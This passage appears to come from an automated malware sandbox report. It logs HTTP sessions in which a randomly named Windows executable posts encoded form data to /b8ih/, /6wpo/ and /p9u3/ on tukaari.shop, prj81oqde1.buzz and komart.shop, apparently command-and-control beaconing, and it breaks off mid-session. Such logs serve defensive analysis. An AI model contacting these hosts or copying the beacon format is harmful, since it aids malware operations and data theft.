                          Data Ascii: 3jE8o=DfbY9zoFUK0o3iw7/dcpefSou3q62VDeDM0J1Kvl3dGxqPKMaaL86k/QQc4f9jJuaDnF5AxevglrRvcVQnGU+jf3BO6IpX5WWQO+0/gr99ZppnKMAEzVNgONq3M7aPNtD6Ynaf1ZZ66MIpxEbzK7EBass4QmCJvlcoULVHMNaFQisKqzAKyDflWBGBEQbdlzDQ==


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          26192.168.2.4497643.33.130.190802412C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exe
                          TimestampBytes transferredDirectionData
                          Sep 23, 2024 14:55:53.084821939 CEST740OUTPOST /b8ih/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US
                          Accept-Encoding: gzip, deflate
                          Host: www.tukaari.shop
                          Origin: http://www.tukaari.shop
                          Connection: close
                          Cache-Control: max-age=0
                          Content-Type: application/x-www-form-urlencoded
                          Content-Length: 222
                          Referer: http://www.tukaari.shop/b8ih/
                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                          Data Raw: 33 6a 45 38 6f 3d 44 66 62 59 39 7a 6f 46 55 4b 30 6f 33 43 41 37 77 63 63 70 4a 76 53 6e 79 48 71 36 35 31 44 61 44 4c 38 4a 31 4f 2f 31 33 76 69 78 70 75 36 4d 64 62 4c 38 76 6b 2f 51 62 38 35 62 35 6a 49 69 61 44 36 6c 35 42 39 65 76 6d 4a 72 52 74 45 56 52 51 36 56 2f 7a 66 31 59 2b 36 4b 30 48 35 57 57 51 4f 2b 30 2f 30 46 39 39 42 70 75 58 36 4d 42 6c 7a 53 52 51 4f 43 38 48 4d 37 4d 2f 4e 68 44 36 59 4a 61 65 70 7a 5a 34 79 4d 49 73 31 45 61 6e 57 34 64 78 61 75 6f 34 52 44 43 70 75 70 51 71 39 6d 4c 56 68 72 59 78 67 76 74 4d 37 70 52 37 54 55 4e 6c 79 79 62 47 4e 6b 57 65 59 36 59 5a 6e 35 71 61 78 4f 2f 71 52 54 74 44 39 43 63 56 65 44 50 4f 59 3d
                          Data Ascii: 3jE8o=DfbY9zoFUK0o3CA7wccpJvSnyHq651DaDL8J1O/13vixpu6MdbL8vk/Qb85b5jIiaD6l5B9evmJrRtEVRQ6V/zf1Y+6K0H5WWQO+0/0F99BpuX6MBlzSRQOC8HM7M/NhD6YJaepzZ4yMIs1EanW4dxauo4RDCpupQq9mLVhrYxgvtM7pR7TUNlyybGNkWeY6YZn5qaxO/qRTtD9CcVeDPOY=


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          27192.168.2.4497653.33.130.190802412C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exe
                          TimestampBytes transferredDirectionData
                          Sep 23, 2024 14:55:55.647617102 CEST10822OUTPOST /b8ih/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US
                          Accept-Encoding: gzip, deflate
                          Host: www.tukaari.shop
                          Origin: http://www.tukaari.shop
                          Connection: close
                          Cache-Control: max-age=0
                          Content-Type: application/x-www-form-urlencoded
                          Content-Length: 10302
                          Referer: http://www.tukaari.shop/b8ih/
                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                          Data Raw: 33 6a 45 38 6f 3d 44 66 62 59 39 7a 6f 46 55 4b 30 6f 33 43 41 37 77 63 63 70 4a 76 53 6e 79 48 71 36 35 31 44 61 44 4c 38 4a 31 4f 2f 31 33 76 71 78 71 59 75 4d 62 35 6a 38 70 55 2f 51 59 38 35 59 35 6a 49 76 61 44 69 70 35 42 67 38 76 6c 39 72 44 65 4d 56 59 42 36 56 32 7a 66 31 46 4f 36 50 70 58 35 35 57 51 65 69 30 2f 6b 46 39 39 42 70 75 55 69 4d 49 55 7a 53 43 41 4f 4e 71 33 4d 33 61 50 4e 4e 44 36 41 2f 61 65 64 4a 5a 49 53 4d 49 4d 6c 45 64 55 2b 34 55 78 61 67 76 34 52 68 43 70 6a 72 51 71 68 45 4c 52 67 4f 59 32 51 76 75 5a 53 4d 4a 61 54 38 55 30 65 70 4e 6b 6c 6d 51 75 4d 73 5a 70 62 74 6d 6f 46 55 6b 37 42 41 72 68 42 4c 59 77 4b 77 4e 4c 6d 52 33 49 32 6a 79 79 47 78 50 63 55 4a 36 59 59 66 39 35 67 45 44 49 79 64 73 57 46 37 63 70 30 2f 4b 4f 4d 54 72 7a 55 48 76 57 50 71 47 78 48 33 57 72 2b 4f 65 76 41 45 41 6e 4c 7a 34 6a 76 30 73 2b 7a 53 75 4d 6d 6a 49 50 6e 58 4b 56 6f 65 43 2f 75 37 49 64 59 55 6b 74 33 31 6b 39 46 4a 49 50 42 6e 2f 57 62 67 51 64 78 74 44 6e 71 32 2b 67 59 4b [TRUNCATED]
                          Data Ascii: 3jE8o=DfbY9zoFUK0o3CA7wccpJvSnyHq651DaDL8J1O/13vqxqYuMb5j8pU/QY85Y5jIvaDip5Bg8vl9rDeMVYB6V2zf1FO6PpX55WQei0/kF99BpuUiMIUzSCAONq3M3aPNND6A/aedJZISMIMlEdU+4Uxagv4RhCpjrQqhELRgOY2QvuZSMJaT8U0epNklmQuMsZpbtmoFUk7BArhBLYwKwNLmR3I2jyyGxPcUJ6YYf95gEDIydsWF7cp0/KOMTrzUHvWPqGxH3Wr+OevAEAnLz4jv0s+zSuMmjIPnXKVoeC/u7IdYUkt31k9FJIPBn/WbgQdxtDnq2+gYK06o8Dhcea13Bph9jISQua+/9/8tQGFcdyu24qbevxLkeupA8ztC3oX1Vj+nDse7hU84Vjwu5Lm6V25qECS5OwJY8M/Nh7A3bqsYzhpKtW81l6MoJJzwlb7fme4FbS9XsCT7ndgySHe43UiU8VgsdbBtbh5Og14AL0sWRrgn9Lx7EjrcBORHaKgdcetsMHLy3zxlNt98rB753SKKyGZDRtb+z1GhsEmMRR4lphERVwPVDKoxGi4R6bYBQP6w1G0mYj5fdGCKndw9WmN6vJQxrANya5Wrco5kcf22WZxv8r+3eiNX+4LOovKohPg4cS+K6qoSqDfNIFwA2CQlwzdP0b/5hVsF7YcYxTYapu6/lmuER2Et65eXXFWBfQMUHeCrpKIVexlZ9rYg9LmDWZKr6GvjRbWGTfGrBGKv31OcOncNYhHg6HwP+/aZifWAIzJQIFWxxZjGiJNrlENskmJ1mkc4iFkrjV7jQ5e5oUcf0mj79UkCDABzX3v8Eee4RO/q7K7P7HyHy1SbOsK1GYbSe/3bKDLq/fkaEc5QfVOtJsyg0igdSxxQPT+16bswI1LEgaBnhp6nGPJ24WqL5XCShlN1+bo2XrdV9xxfwolTgFPRlZoGIiLGEnztAmxYTTGG+ewS/XFO/h0GhguHM134Wef7hxlVwWujTL4 [TRUNCATED]


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          28192.168.2.4497663.33.130.190802412C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exe
                          TimestampBytes transferredDirectionData
                          Sep 23, 2024 14:55:58.189755917 CEST456OUTGET /b8ih/?3jE8o=Odz4+FoaeIgH5S8C9OYZQc3ouWeZxTDEesAV9dDAx8uax8eIV9nl6gv+Nqhf7GxjMHuq3WRF/H9yecUAbTD83GPUGNWv010JVF29ycwpsNNUnGWJNXrEBFE=&oB=mVppHlHxM HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US
                          Host: www.tukaari.shop
                          Connection: close
                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                          Sep 23, 2024 14:55:58.639041901 CEST394INHTTP/1.1 200 OK
                          Server: openresty
                          Date: Mon, 23 Sep 2024 12:55:58 GMT
                          Content-Type: text/html
                          Content-Length: 254
                          Connection: close
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 33 6a 45 38 6f 3d 4f 64 7a 34 2b 46 6f 61 65 49 67 48 35 53 38 43 39 4f 59 5a 51 63 33 6f 75 57 65 5a 78 54 44 45 65 73 41 56 39 64 44 41 78 38 75 61 78 38 65 49 56 39 6e 6c 36 67 76 2b 4e 71 68 66 37 47 78 6a 4d 48 75 71 33 57 52 46 2f 48 39 79 65 63 55 41 62 54 44 38 33 47 50 55 47 4e 57 76 30 31 30 4a 56 46 32 39 79 63 77 70 73 4e 4e 55 6e 47 57 4a 4e 58 72 45 42 46 45 3d 26 6f 42 3d 6d 56 70 70 48 6c 48 78 4d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?3jE8o=Odz4+FoaeIgH5S8C9OYZQc3ouWeZxTDEesAV9dDAx8uax8eIV9nl6gv+Nqhf7GxjMHuq3WRF/H9yecUAbTD83GPUGNWv010JVF29ycwpsNNUnGWJNXrEBFE=&oB=mVppHlHxM"}</script></head></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          29192.168.2.449767154.212.219.2802412C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exe
                          TimestampBytes transferredDirectionData
                          Sep 23, 2024 14:56:04.129734039 CEST729OUTPOST /6wpo/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US
                          Accept-Encoding: gzip, deflate
                          Host: www.prj81oqde1.buzz
                          Origin: http://www.prj81oqde1.buzz
                          Connection: close
                          Cache-Control: max-age=0
                          Content-Type: application/x-www-form-urlencoded
                          Content-Length: 202
                          Referer: http://www.prj81oqde1.buzz/6wpo/
                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                          Data Raw: 33 6a 45 38 6f 3d 68 2f 69 6f 6e 62 51 57 6a 62 76 69 30 55 77 69 76 38 39 75 68 6c 4d 45 74 58 4f 75 59 4e 76 52 42 4b 6d 47 4c 53 45 6e 4e 48 76 47 2b 61 78 36 51 59 76 72 54 32 33 36 42 78 65 43 33 52 6d 64 65 71 42 75 32 53 44 57 4e 70 65 70 4e 2b 75 46 75 51 45 7a 63 42 4f 78 75 48 6e 59 30 57 44 51 77 7a 77 39 44 49 61 66 73 6c 36 73 46 6c 4d 6a 42 48 6d 51 61 77 41 43 37 6d 66 39 4b 38 41 69 6d 38 6b 50 77 78 6e 5a 79 42 57 4c 4d 30 4f 45 51 58 38 78 51 65 2b 2f 53 79 42 4d 6a 69 55 74 42 5a 72 39 4d 6e 46 52 6f 79 5a 4e 34 50 53 4f 49 67 77 4f 50 4e 50 54 53 66 33 76 6d 77 67 65 64 77 3d 3d
                          Data Ascii: 3jE8o=h/ionbQWjbvi0Uwiv89uhlMEtXOuYNvRBKmGLSEnNHvG+ax6QYvrT236BxeC3RmdeqBu2SDWNpepN+uFuQEzcBOxuHnY0WDQwzw9DIafsl6sFlMjBHmQawAC7mf9K8Aim8kPwxnZyBWLM0OEQX8xQe+/SyBMjiUtBZr9MnFRoyZN4PSOIgwOPNPTSf3vmwgedw==
                          Sep 23, 2024 14:56:05.209104061 CEST289INHTTP/1.1 404 Not Found
                          Server: nginx
                          Date: Mon, 23 Sep 2024 12:56:04 GMT
                          Content-Type: text/html
                          Content-Length: 146
                          Connection: close
                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          30192.168.2.449768154.212.219.2802412C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exe
                          TimestampBytes transferredDirectionData
                          Sep 23, 2024 14:56:06.679785013 CEST749OUTPOST /6wpo/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US
                          Accept-Encoding: gzip, deflate
                          Host: www.prj81oqde1.buzz
                          Origin: http://www.prj81oqde1.buzz
                          Connection: close
                          Cache-Control: max-age=0
                          Content-Type: application/x-www-form-urlencoded
                          Content-Length: 222
                          Referer: http://www.prj81oqde1.buzz/6wpo/
                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                          Data Raw: 33 6a 45 38 6f 3d 68 2f 69 6f 6e 62 51 57 6a 62 76 69 31 30 41 69 75 61 31 75 74 56 4d 4c 69 33 4f 75 4b 4e 76 64 42 4b 71 47 4c 58 38 33 4b 79 33 47 2f 36 68 36 52 61 4c 72 51 32 33 36 4b 52 65 44 34 78 6d 44 65 72 38 62 32 51 58 57 4e 71 69 70 4e 38 32 46 76 6e 59 77 64 52 4f 2f 69 6e 6e 61 70 47 44 51 77 7a 77 39 44 49 4f 35 73 6c 53 73 46 51 45 6a 41 69 4b 58 47 41 41 42 2b 6d 66 39 4f 38 41 63 6d 38 6c 59 77 30 4f 38 79 43 75 4c 4d 32 47 45 54 47 38 79 4c 4f 2b 31 50 69 41 6f 72 69 5a 4a 44 70 75 38 45 6c 5a 39 32 41 68 4d 35 4a 44 55 5a 52 52 5a 64 4e 72 67 50 59 2b 62 72 7a 64 58 47 36 55 51 79 6e 38 49 53 33 71 62 48 36 58 45 74 32 32 39 51 58 41 3d
                          Data Ascii: 3jE8o=h/ionbQWjbvi10Aiua1utVMLi3OuKNvdBKqGLX83Ky3G/6h6RaLrQ236KReD4xmDer8b2QXWNqipN82FvnYwdRO/innapGDQwzw9DIO5slSsFQEjAiKXGAAB+mf9O8Acm8lYw0O8yCuLM2GETG8yLO+1PiAoriZJDpu8ElZ92AhM5JDUZRRZdNrgPY+brzdXG6UQyn8IS3qbH6XEt229QXA=
                          Sep 23, 2024 14:56:07.556473970 CEST289INHTTP/1.1 404 Not Found
                          Server: nginx
                          Date: Mon, 23 Sep 2024 12:56:07 GMT
                          Content-Type: text/html
                          Content-Length: 146
                          Connection: close
                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          31192.168.2.449769154.212.219.2802412C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exe
                          TimestampBytes transferredDirectionData
                          Sep 23, 2024 14:56:09.221528053 CEST10831OUTPOST /6wpo/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US
                          Accept-Encoding: gzip, deflate
                          Host: www.prj81oqde1.buzz
                          Origin: http://www.prj81oqde1.buzz
                          Connection: close
                          Cache-Control: max-age=0
                          Content-Type: application/x-www-form-urlencoded
                          Content-Length: 10302
                          Referer: http://www.prj81oqde1.buzz/6wpo/
                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                          Data Raw: 33 6a 45 38 6f 3d 68 2f 69 6f 6e 62 51 57 6a 62 76 69 31 30 41 69 75 61 31 75 74 56 4d 4c 69 33 4f 75 4b 4e 76 64 42 4b 71 47 4c 58 38 33 4b 78 58 47 2f 4d 74 36 51 37 4c 72 52 32 33 36 48 78 65 47 34 78 6e 47 65 72 6b 66 32 51 72 47 4e 73 6d 70 4d 66 2b 46 6f 53 73 77 55 52 4f 2f 71 48 6e 62 30 57 44 67 77 33 64 32 44 49 65 35 73 6c 53 73 46 52 30 6a 57 48 6d 58 45 41 41 43 37 6d 66 68 4b 38 42 78 6d 38 73 74 77 30 4b 43 79 79 4f 4c 43 32 32 45 57 30 55 79 48 4f 2b 7a 4f 69 41 77 72 69 56 57 44 70 79 4b 45 6b 74 54 32 44 39 4d 37 4d 47 39 4c 6c 51 47 4b 2b 66 4a 53 4c 43 34 76 69 35 46 47 37 49 2f 36 31 59 78 51 33 57 6c 4b 4b 7a 4b 77 54 79 42 4b 44 64 61 51 31 79 32 65 30 47 33 4f 39 78 4f 52 32 67 64 6e 6b 6b 76 48 4b 50 57 55 39 46 52 6e 34 5a 68 79 74 6e 56 31 6a 6f 41 43 31 74 55 43 44 48 2b 73 55 33 46 79 50 74 68 46 44 64 6d 50 69 4e 59 50 38 79 49 78 73 73 38 4d 4c 57 59 31 6f 71 30 45 41 37 7a 79 6e 65 33 73 36 46 59 45 70 75 5a 66 7a 2f 64 4d 72 32 72 77 51 50 72 2b 6a 47 54 54 4e 46 59 [TRUNCATED]
                          Data Ascii: 3jE8o=h/ionbQWjbvi10Aiua1utVMLi3OuKNvdBKqGLX83KxXG/Mt6Q7LrR236HxeG4xnGerkf2QrGNsmpMf+FoSswURO/qHnb0WDgw3d2DIe5slSsFR0jWHmXEAAC7mfhK8Bxm8stw0KCyyOLC22EW0UyHO+zOiAwriVWDpyKEktT2D9M7MG9LlQGK+fJSLC4vi5FG7I/61YxQ3WlKKzKwTyBKDdaQ1y2e0G3O9xOR2gdnkkvHKPWU9FRn4ZhytnV1joAC1tUCDH+sU3FyPthFDdmPiNYP8yIxss8MLWY1oq0EA7zyne3s6FYEpuZfz/dMr2rwQPr+jGTTNFYKYJ1R4b92/XUpswHJr4aWYJEmzCX41bPkk6LEefA566mbxQm6EpDlQeXBD9C+wNMvymG27O6GXsAcLW5ZwR4G91/QVxz92n5pxf4LwriIx7bt4L2SsIk4Xyl0IuidON3LnvDPtFJitZhIqg+7NIEtAz5Q20K6jeOAOiw1GSsz3MRviz3FlbDHXaI5MC943vCISH3C5Vq/PFWVMP4Qbz8ukslhIivpiSXDz0lDRTI3WgTtLgxDx0yltdn+EtVHMGnEDpHrraLoIEc1pAi58ppS6Lm5nxjC7EZ83i9GNeTxsWF8k3+M6M47LV/FPweVhqPY7mX+Vqy5kjUuhXC5nkyVzznarqsr+BmGhHJgbi05lZ3lNacUbDtFtH9RM4PnW1K7RabYgmNOTyNTpugN5+AVaqYhWG0C+N4PVyoe8qQhKcNz9oxQ89TieTJBcSDeNnec3tnsGeNXZI+d05Jvc81XnrP9ILF64Po9fTnIRo6F0lZuGgF2x6XEf4P3gf29OkfXwfUPNU/tx9DIgZ91sS5YRF9rFc3NmvdtO8zx6G7KT7/qWff7eGyCYmkp71yoGt3VHpOis+nRtve2WIgMcFOhlKEZD7w57bjN+KsjvFhmYS18ipFszbKppMwi+5zV42oLYuYZefb9rzqcaBHgpI3EwfJ9YMEW6ZiqW [TRUNCATED]
                          Sep 23, 2024 14:56:10.089875937 CEST289INHTTP/1.1 404 Not Found
                          Server: nginx
                          Date: Mon, 23 Sep 2024 12:56:09 GMT
                          Content-Type: text/html
                          Content-Length: 146
                          Connection: close
                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          32192.168.2.449770154.212.219.2802412C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exe
                          TimestampBytes transferredDirectionData
                          Sep 23, 2024 14:56:11.767707109 CEST459OUTGET /6wpo/?oB=mVppHlHxM&3jE8o=s9KIkrkzrqTbzkMmh7Bli3B0wEyBHaCwBa6qLgEcFDzVo4ZyZuXCeDvxdW3wzkiXZ/4dwHLmTrOaI9mNhjMAcV+6tVbS2gqGz3F/PYSng2mbFSIjOzq2Kmk= HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US
                          Host: www.prj81oqde1.buzz
                          Connection: close
                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                          Sep 23, 2024 14:56:12.638084888 CEST289INHTTP/1.1 404 Not Found
                          Server: nginx
                          Date: Mon, 23 Sep 2024 12:56:12 GMT
                          Content-Type: text/html
                          Content-Length: 146
                          Connection: close
                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          33192.168.2.449771133.130.35.90802412C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exe
                          TimestampBytes transferredDirectionData
                          Sep 23, 2024 14:56:19.000577927 CEST717OUTPOST /p9u3/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US
                          Accept-Encoding: gzip, deflate
                          Host: www.komart.shop
                          Origin: http://www.komart.shop
                          Connection: close
                          Cache-Control: max-age=0
                          Content-Type: application/x-www-form-urlencoded
                          Content-Length: 202
                          Referer: http://www.komart.shop/p9u3/
                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                          Data Raw: 33 6a 45 38 6f 3d 4f 33 68 38 38 30 4a 61 6f 65 74 31 45 64 4a 4a 52 67 74 70 74 58 56 73 4e 6a 49 72 36 62 4f 67 38 4d 39 38 47 63 75 49 68 53 7a 6f 4f 54 4b 4a 49 50 6b 6a 30 36 52 6d 6c 46 33 54 65 61 71 62 51 42 4d 6d 57 56 69 6c 6b 70 78 31 55 79 4d 6c 63 4b 46 53 2f 65 77 59 71 68 6a 56 41 78 6e 50 38 42 71 2b 51 69 53 78 42 39 47 73 45 56 4b 67 59 56 38 76 31 4b 33 55 5a 50 53 54 55 57 74 63 30 35 71 43 52 4a 74 42 41 38 67 78 35 48 4a 70 4e 30 31 41 78 77 65 56 43 52 75 35 6a 53 4b 66 6b 7a 6b 42 57 2b 66 61 38 37 56 78 63 63 32 79 72 71 66 51 57 39 54 4b 62 45 6e 66 41 6f 58 58 51 67 3d 3d
                          Data Ascii: 3jE8o=O3h880Jaoet1EdJJRgtptXVsNjIr6bOg8M98GcuIhSzoOTKJIPkj06RmlF3TeaqbQBMmWVilkpx1UyMlcKFS/ewYqhjVAxnP8Bq+QiSxB9GsEVKgYV8v1K3UZPSTUWtc05qCRJtBA8gx5HJpN01AxweVCRu5jSKfkzkBW+fa87Vxcc2yrqfQW9TKbEnfAoXXQg==
                          Sep 23, 2024 14:56:19.783165932 CEST668INHTTP/1.1 404 Not Found
                          content-encoding: gzip
                          content-type: text/html
                          date: Mon, 23 Sep 2024 12:56:19 GMT
                          etag: W/"66d6a4ca-2b5"
                          server: nginx
                          vary: Accept-Encoding
                          content-length: 454
                          connection: close
                          Data Raw: 1f 8b 08 00 00 00 00 00 04 03 75 92 bd 6e 14 31 10 c7 fb 7b 0a e3 2a 91 b2 e7 43 29 63 6f 03 d4 49 71 0d d5 c9 f1 4e 6e 1d bc de c5 9e bb 70 42 3c cc 29 bb 4f 40 91 e3 43 91 20 a2 40 48 50 82 28 a0 42 3c 00 05 2d f6 7a 57 80 10 6e ec d9 f9 cf 6f be 96 df ba 7b 7c 67 7e ff e4 1e 29 b1 32 f9 84 c7 8b 18 69 97 82 9e 4b 1a 3f 80 2c f2 09 21 1c 35 1a c8 db a7 ed fb ee f3 f6 65 b7 6b 3f bc de 3d ff da 5e b5 5f da 17 ed 0f ce 92 3f 2a 2b 40 19 78 d8 64 f0 70 a5 d7 82 aa da 22 58 cc 70 d3 00 25 83 25 28 c2 23 64 31 e1 11 51 a5 74 1e 50 c0 4a 65 e7 0d 25 ac 4f d9 83 ac ac 40 d0 b5 86 8b a6 76 f8 47 f8 85 2e b0 14 05 ac b5 82 ac 37 0e 88 b6 1a b5 34 99 57 d2 80 b8 3d 9d 85 16 42 45 46 db 07 c4 81 11 d4 e3 c6 80 2f 01 02 a9 74 70 26 28 53 de 33 70 ae 76 d3 f0 8a 2d b3 d4 33 3f ad 8b 4d 30 0b bd 26 ca 48 ef 05 0d 1d 45 61 82 ea 6a 49 bc 53 81 10 5e 89 30 70 1a bb a4 44 1a 14 34 94 fb 57 e4 62 a1 2b b9 84 04 f8 17 bc 58 54 e0 fd 28 08 85 37 b1 fc 78 fe 37 f7 ed 25 3f 75 a3 e8 70 f6 f6 66 f7 ad 7d d7 5d 75 df bb [TRUNCATED]
                          Data Ascii: un1{*C)coIqNnpB<)O@C @HP(B<-zWno{|g~)2iK?,!5ek?=^_?*+@xdp"Xp%%(#d1QtPJe%O@vG.74W=BEF/tp&(S3pv-3?M0&HEajIS^0pD4Wb+XT(7x7%?upf}]uOo_l{84OR(g2BqB"n+WG}z@g*{bLdtLQ$$|k


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          34192.168.2.449772133.130.35.90802412C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exe
                          TimestampBytes transferredDirectionData
                          Sep 23, 2024 14:56:21.556082964 CEST737OUTPOST /p9u3/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US
                          Accept-Encoding: gzip, deflate
                          Host: www.komart.shop
